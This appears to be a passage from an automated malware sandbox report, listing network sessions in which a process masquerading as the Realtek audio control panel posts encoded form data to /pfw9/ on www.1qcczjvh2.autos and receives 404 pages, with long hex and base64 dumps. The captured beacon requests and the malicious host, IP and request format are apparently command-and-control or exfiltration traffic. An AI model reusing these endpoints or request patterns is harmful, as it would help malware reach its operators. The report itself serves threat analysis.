                                                                                        Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                        Nov 27, 2024 11:30:09.984672070 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
                                                                                        Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                        Nov 27, 2024 11:30:09.984726906 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                        Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                        Nov 27, 2024 11:30:09.984735966 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                        Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                        Nov 27, 2024 11:30:09.984746933 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                        Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
                                                                                        Nov 27, 2024 11:30:09.984886885 CET1289INData Raw: 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66
                                                                                        Data Ascii: Lj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZ
                                                                                        Nov 27, 2024 11:30:09.985342979 CET1289INData Raw: 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57 49 49 36
                                                                                        Data Ascii: 78tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imbHCp
                                                                                        Nov 27, 2024 11:30:10.315022945 CET1289INData Raw: 45 47 68 32 32 4a 36 2f 71 6b 74 4b 52 32 52 62 32 61 57 77 66 2b 69 42 30 4e 41 6a 76 32 37 44 62 7a 42 62 46 75 61 7a 55 6d 55 73 64 6c 69 53 4a 68 32 45 6a 4c 63 55 69 57 54 39 59 64 32 62 68 34 50 69 2b 30 51 4d 59 32 48 4b 6c 37 58 4a 45 74
                                                                                        Data Ascii: EGh22J6/qktKR2Rb2aWwf+iB0NAjv27DbzBbFuazUmUsdliSJh2EjLcUiWT9Yd2bh4Pi+0QMY2HKl7XJEtcp5+UcvP7N31rQj21ZU9yvVmEA7HOxea8jqpz0cvK44XIOCrHSzVQy7mrmGPz9uy9XS2sF3wHEGkKIP3z4WFfufVrR0A8a831chj4DlitoMVZGLzgB+AJEPiMIJWMsTt+Hw7R+8wVgrBW0fw2MMGDUY9Y0hr1W968


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.11.204976343.163.1.110807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:30:12.502510071 CET700OUTPOST /pfw9/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.1qcczjvh2.autos
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 223
                                                                                        Origin: http://www.1qcczjvh2.autos
                                                                                        Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Raw: 77 49 58 68 41 47 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 46 53 77 6e 6c 71 38 4f 35 37 54 4c 7a 51 72 6f 79 59 73 53 6f 70 61 63 65 67 64 62 59 58 76 79 33 35 6b 42 2b 67 6d 47 35 79 34 4e 42 45 44 50 78 34 65 76 7a 73 77 56 4f 38 35 4c 53 62 73 49 4a 76 56 39 4b 71 69 4a 4d 6d 31 4b 63 47 31 43 64 5a 72 6a 66 75 55 63 47 46 46 32 47 68 35 32 4a 6c 4e 77 5a 63 6d 65 37 6f 6b 5a 39 52 49 7a 43 67 32 77 6f 47 56 65 76 47 59 2b 42 44 41 42 6a 67 64 4a 58 45 67 70 78 79 32 43 61 55 6b 39 59 42 45 45 46 2b 72 75 72 47 49 73 35 32 55 6c 53 74 58 5a 75 46 4d 31 49 4f 49 34 55 4f 58 78 71 6d 45 53 58 56 7a 42 34 46 78 75 69 50 55 69 36 57 41 76 4e 41 6f 6c 4b 4a 45 3d
                                                                                        Data Ascii: wIXhAG=17NZVBLvh1g4FSwnlq8O57TLzQroyYsSopacegdbYXvy35kB+gmG5y4NBEDPx4evzswVO85LSbsIJvV9KqiJMm1KcG1CdZrjfuUcGFF2Gh52JlNwZcme7okZ9RIzCg2woGVevGY+BDABjgdJXEgpxy2CaUk9YBEEF+rurGIs52UlStXZuFM1IOI4UOXxqmESXVzB4FxuiPUi6WAvNAolKJE=
                                                                                        Nov 27, 2024 11:30:12.835210085 CET1289INHTTP/1.1 404 Not Found
                                                                                        Server: Tengine
                                                                                        Date: Wed, 27 Nov 2024 10:30:12 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 58288
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        ETag: "67344967-e3b0"
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                        Nov 27, 2024 11:30:12.835244894 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                        Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                        Nov 27, 2024 11:30:12.835262060 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                        Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                        Nov 27, 2024 11:30:12.835274935 CET246INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                        Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                        Nov 27, 2024 11:30:12.835427999 CET1289INData Raw: 41 42 61 68 6b 48 67 32 6a 73 50 5a 6d 48 6a 54 50 58 42 6f 6b 2b 39 77 43 77 44 62 61 57 79 37 49 6d 4f 6b 53 46 37 48 73 68 6c 6a 4a 54 48 34 6c 66 62 52 63 4a 41 6b 32 2b 6b 38 52 4f 56 74 6e 76 66 67 4d 42 36 48 35 58 70 73 37 76 36 70 4f 43
                                                                                        Data Ascii: ABahkHg2jsPZmHjTPXBok+9wCwDbaWy7ImOkSF7HshljJTH4lfbRcJAk2+k8ROVtnvfgMB6H5Xps7v6pOC7pcnqGCqAgO+0kQ47BeoRlR8brAHwHoFH+4wyooQaVTjebo220+2njFZ3+9eqljVd0KgdgJh7VsQIAcBx2XLvDSoIeUcyoCGAVjW1bqDMhec0wwfbdmU+wtw4QJTt2KEWjwjzLLi7E47Bcj01HJPB0LzU9k2A/yj0
                                                                                        Nov 27, 2024 11:30:12.835501909 CET1289INData Raw: 2f 44 67 41 6a 77 4f 79 35 55 51 4d 51 43 32 55 6d 42 4d 5a 74 47 55 43 35 56 51 57 42 6d 76 67 6c 67 42 59 4e 6d 52 38 65 30 41 4c 49 47 4e 44 7a 34 52 55 6e 76 57 61 7a 32 47 52 72 51 65 44 49 34 61 32 47 2b 61 6e 51 4b 4a 2f 31 71 48 4a 55 44
                                                                                        Data Ascii: /DgAjwOy5UQMQC2UmBMZtGUC5VQWBmvglgBYNmR8e0ALIGNDz4RUnvWaz2GRrQeDI4a2G+anQKJ/1qHJUDIAnDEnh0ByMo1z76ZNr8i0jP7w+ZoiGbQ2HZvA4BO4BUkQLMyYJQDhjQbZgwEm5IOHhzD47BcCWNW2HBYREhnBBPUgv08wsS0K7+e/7QZgJ9hJ1SihJfmE6r2AoNGNUVZR2k2i9pp90v5T+W9kMkAMB+21RIAAAwI
                                                                                        Nov 27, 2024 11:30:12.835618019 CET1289INData Raw: 50 44 73 63 34 31 42 31 6a 75 5a 71 56 31 58 50 58 69 73 4b 54 55 6e 50 52 66 63 68 67 37 50 75 76 34 44 75 38 71 50 67 48 56 76 41 58 31 2f 44 79 7a 63 67 42 65 42 6a 41 58 77 48 34 41 32 77 31 47 2f 54 53 44 55 64 38 32 7a 2b 50 2b 31 79 6b 79
                                                                                        Data Ascii: PDsc41B1juZqV1XPXisKTUnPRfchg7Puv4Du8qPgHVvAX1/DyzcgBeBjAXwH4A2w1G/TSDUd82z+P+1ykyhocA3M7M7OJTp2oCGCs66NBsPd+gdEktAysy/CFQp5lIlbvlQqe2t9B+FGADWNR/z1k9jCUcCjTZTaL4+vqzU8MxI24gigrt8NGGZUpiIlHhOYUckAHGnYCf1naFZ4YkNt34n54SGox6jcGob2Yw6scC2AhZMPJry
                                                                                        Nov 27, 2024 11:30:12.835652113 CET1289INData Raw: 38 43 41 41 71 6a 6e 2b 74 6c 4d 35 76 72 79 46 2b 38 37 4d 61 53 57 72 72 70 39 4b 4d 4a 39 73 42 66 76 34 41 33 67 62 77 43 34 42 59 67 31 48 2f 69 63 47 6f 2f 39 66 6d 75 5a 45 73 54 57 4c 7a 43 5a 39 6d 4d 72 64 6e 50 35 36 2f 44 71 76 34 71
                                                                                        Data Ascii: 8CAAqjn+tlM5vryF+87MaSWrrp9KMJ9sBfv4A3gbwC4BYg1H/icGo/9fmuZEsTWLzCZ9mMrdnP56/Dqv4qAQyY7fAWFq22VKnkNZzmlauOpiGtewJnnvexi1uAYhwrOf/KaIAHLdnlGWyDv3pzJQuuJPSEwwPT5t9vZq1qdQ0niP6UxqGAeA4uhxapflB+OnsTQeBf3H6k8Go9zUY9R8gbykHwCDYcFYA4K9VzetQs1yLtxZsUq
                                                                                        Nov 27, 2024 11:30:12.835669994 CET1289INData Raw: 39 56 38 61 6a 48 70 62 49 34 79 2f 6c 53 34 31 77 78 6b 41 6d 33 6c 6f 41 47 43 52 78 4a 61 52 47 61 74 4b 77 47 78 35 65 4c 64 51 46 43 2b 66 75 58 2b 33 4f 73 73 6e 42 4b 6a 6d 2b 5a 68 75 4e 53 65 75 51 70 32 4b 63 32 42 62 30 66 52 33 46 68
                                                                                        Data Ascii: 9V8ajHpbI4y/lS41wxkAm3loAGCRxJaRGatKwGx5eLdQFC+fuX+3OssnBKjm+ZhuNSeuQp2Kc2Bb0fR3FhXrKW2fR7+QyNOQi3XYJTXX8vn5lHn1kZDaB7L8DgcVH9K8YoX9RCQCgIrn4unF93Oh4pWE5ZxjUbH/2A0kg1FfwhCrnwDCfsjrnbbzW/MgQlaQl3b05TupXQcv2VIJL9c7B7XwaAAuhy9wIHM+vLj1kOOxAOAqGPu
                                                                                        Nov 27, 2024 11:30:12.835794926 CET1289INData Raw: 41 56 34 73 6b 70 53 64 51 41 49 30 47 6b 6d 55 39 66 65 41 6e 54 71 79 58 61 61 69 73 4d 39 4b 69 78 45 77 67 4f 41 2f 6f 30 2b 76 51 42 41 38 64 72 4a 6a 5a 53 73 52 5a 66 33 7a 43 42 6b 35 67 79 42 56 74 55 79 4c 64 64 36 55 38 50 7a 4f 30 61
                                                                                        Data Ascii: AV4skpSdQAI0GkmU9feAnTqyXaaisM9KixEwgOA/o0+vQBA8drJjZSsRZf3zCBk5gyBVtUyLdd6U8PzO0at2c0gcB0UNHH6n5AOZTDqtQajfgRkJZW3ATiiQZUYoNP0G9dmZtcOCze9iK7PXYDAv2TDPgU66oqD5ufAYVGBcxIUriXawyUOq1e98LOQg8seIt2Uvdh4+fum5+9f6ww7tdnUnDA+pEGHfV8c2578tH/JFiqen+dg
                                                                                        Nov 27, 2024 11:30:13.168908119 CET1289INData Raw: 30 31 5a 77 75 4b 57 4c 65 78 53 6c 4b 48 6e 30 38 76 58 48 52 36 77 49 35 50 77 62 42 55 61 59 4d 43 78 33 30 51 4d 72 37 44 79 53 39 4f 78 41 62 34 61 37 33 61 36 51 54 56 61 43 6a 63 38 63 6c 44 44 57 41 73 67 4b 30 47 6f 37 36 6d 41 39 65 35
                                                                                        Data Ascii: 01ZwuKWLexSlKHn08vXHR6wI5PwbBUaYMCx30QMr7DyS9OxAb4a73a6QTVaCjc8clDDWAsgK0Go76mA9e5gh2AXcVJ/o/k+53xzek15Ut4n2hRpcQPjef+lg5v7XQF7V+EA9OcJ51+jSIvADhYyCkRchhKDIAoMPY8GHsawGtE+AWwcJCkJgB8FNxmi+t6bB+DUV/aYNR/C2AhlBUheYBVp+Ln9Aup3Th86uoEGh22J6/qktKR2


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.11.204976443.163.1.110807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:30:15.366075039 CET1289OUTPOST /pfw9/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.1qcczjvh2.autos
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 7371
                                                                                        Origin: http://www.1qcczjvh2.autos
                                                                                        Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Raw: 77 49 58 68 41 47 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 46 53 77 6e 6c 71 38 4f 35 37 54 4c 7a 51 72 6f 79 59 73 53 6f 70 61 63 65 67 64 62 59 58 6e 79 77 4d 6f 42 34 48 53 47 6f 43 34 4e 66 55 44 4b 78 34 65 69 7a 73 6f 52 4f 38 46 31 53 5a 6b 49 49 4a 4a 39 4d 62 69 4a 48 6d 31 4b 56 6d 31 42 51 35 72 32 66 76 6b 6d 47 47 39 32 47 68 35 32 4a 6a 70 77 51 75 4f 65 35 6f 6b 65 71 68 49 42 47 67 33 58 6f 47 4e 4f 76 47 4d 55 42 7a 67 42 6a 41 4e 4a 56 79 38 70 73 43 32 41 4a 6b 6b 6c 59 42 4a 61 46 2b 6d 56 72 48 39 4a 35 32 73 6c 51 5a 32 5a 72 6b 34 34 52 34 63 71 57 2f 6e 6c 69 47 55 52 5a 6e 62 56 33 55 52 2b 72 71 4d 72 79 6b 63 68 57 52 42 69 63 2b 4f 34 70 64 64 34 4c 35 64 55 31 67 33 77 4e 4e 4f 45 62 49 4e 46 66 4b 49 6b 79 79 36 63 7a 79 54 37 72 49 50 73 53 77 6e 66 50 63 36 2f 50 42 68 54 76 33 6a 58 48 5a 35 52 41 46 41 53 37 6e 4f 6e 56 6c 41 41 2b 69 61 6a 55 72 54 2f 66 51 39 36 65 4a 2f 53 2b 42 66 39 38 43 4a 32 79 37 6a 62 6c 6d 4c 69 30 44 58 57 5a 47 59 32 46 48 62 4a 68 6c 69 [TRUNCATED]
                                                                                        Data Ascii: wIXhAG=17NZVBLvh1g4FSwnlq8O57TLzQroyYsSopacegdbYXnywMoB4HSGoC4NfUDKx4eizsoRO8F1SZkIIJJ9MbiJHm1KVm1BQ5r2fvkmGG92Gh52JjpwQuOe5okeqhIBGg3XoGNOvGMUBzgBjANJVy8psC2AJkklYBJaF+mVrH9J52slQZ2Zrk44R4cqW/nliGURZnbV3UR+rqMrykchWRBic+O4pdd4L5dU1g3wNNOEbINFfKIkyy6czyT7rIPsSwnfPc6/PBhTv3jXHZ5RAFAS7nOnVlAA+iajUrT/fQ96eJ/S+Bf98CJ2y7jblmLi0DXWZGY2FHbJhlin+kPXPywg0tWDIICPLweWfBQxu/pKdVIkOKSBRMFWwKZp5H+kkFHid5x4kYUD/DseeM6sQzBDWO4pYsf9EGf/O/Kxf+iWPCZLZaiH0CmTeluQelGvnQkdXbsr7HnIjzRtGCbY8ZFJVvZ9IA4vzhZbV9c6YRSdNS9GUe0IW46sS7A/DZjEhBNtbBBcInGrXR9QSxXuKEUPGkGrdjr4gthkb4bV69mCLKhibrkS2xBuwZun0acVbK8ckOuTm0TyxdUyM6/WYUpDRmlTCKJL7xwI2X8Ucw+OhgCXt3frzHrzWWwud1PDEylp48JbmR1zgvCpBwnrP6rXaP/yCl66iByLA4odrJZUm3nF1AKauopv//heN9TgHDCYysckUqYvo3wNyQRcIzf5VRfhzHyTVe0W55exGJRseP0EYhuWpHofCxnoKgPtNi+3gOVyVwD31DHbMdgC/DIueUYHbIC3hgZ/vAx8
                                                                                        Nov 27, 2024 11:30:15.366127014 CET2578OUTData Raw: 38 38 74 7a 79 4c 69 76 74 6f 55 4e 6e 32 46 6f 65 6b 31 6f 70 67 39 6e 67 75 65 55 67 65 4b 2f 45 6b 71 79 6e 53 44 36 49 6f 5a 6e 35 55 49 74 2b 75 76 6f 46 2b 45 37 67 63 30 79 47 39 66 67 7a 4d 62 53 79 7a 57 65 46 4e 68 56 36 4b 58 51 62 6a
                                                                                        Data Ascii: 88tzyLivtoUNn2Foek1opg9ngueUgeK/EkqynSD6IoZn5UIt+uvoF+E7gc0yG9fgzMbSyzWeFNhV6KXQbj75ZodlQRl6nnAQt29S9lAHigOTkwHaLBu6naP0+lOmBhcs2+fJ3meXKsoBzBCiQCfQM+7f0Mf4CX9Yxx7G6A7fqUcQhRfOFTcWgMBeHETm/aMbYCF9mJ4jmg/Y3cj06DaMHVFkueyaC8HRZLKdb6ASCItHqJLiYI6
                                                                                        Nov 27, 2024 11:30:15.366178036 CET3982OUTData Raw: 33 63 39 74 77 68 47 62 4e 6c 6d 4b 44 31 4a 4e 67 56 64 69 4f 4e 69 6c 38 39 45 56 64 51 63 66 43 4d 75 74 63 59 6e 56 36 58 2f 48 4e 6a 77 63 66 47 33 32 78 7a 4d 75 6e 66 31 2b 4c 74 5a 44 7a 72 4c 62 6a 49 48 45 57 52 42 66 78 2f 63 34 74 6f
                                                                                        Data Ascii: 3c9twhGbNlmKD1JNgVdiONil89EVdQcfCMutcYnV6X/HNjwcfG32xzMunf1+LtZDzrLbjIHEWRBfx/c4toVeEIU6pYDMhrvxminVfTsX57lquNiQjcjyu1DS5dqb8rfIGC+fejt9ZsaN2t0GZQ4ldBOQaGCjLSiUX9m61jyvnSsge6f7SOS9mzYZ8Ub1tCnvvKaxnHJ1MuozBekDDpngd1v6HDdelGH0KjtbPunALy4ugiCh0QD
                                                                                        Nov 27, 2024 11:30:15.703969955 CET1289INHTTP/1.1 404 Not Found
                                                                                        Server: Tengine
                                                                                        Date: Wed, 27 Nov 2024 10:30:15 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 58288
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        ETag: "67344967-e3b0"
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
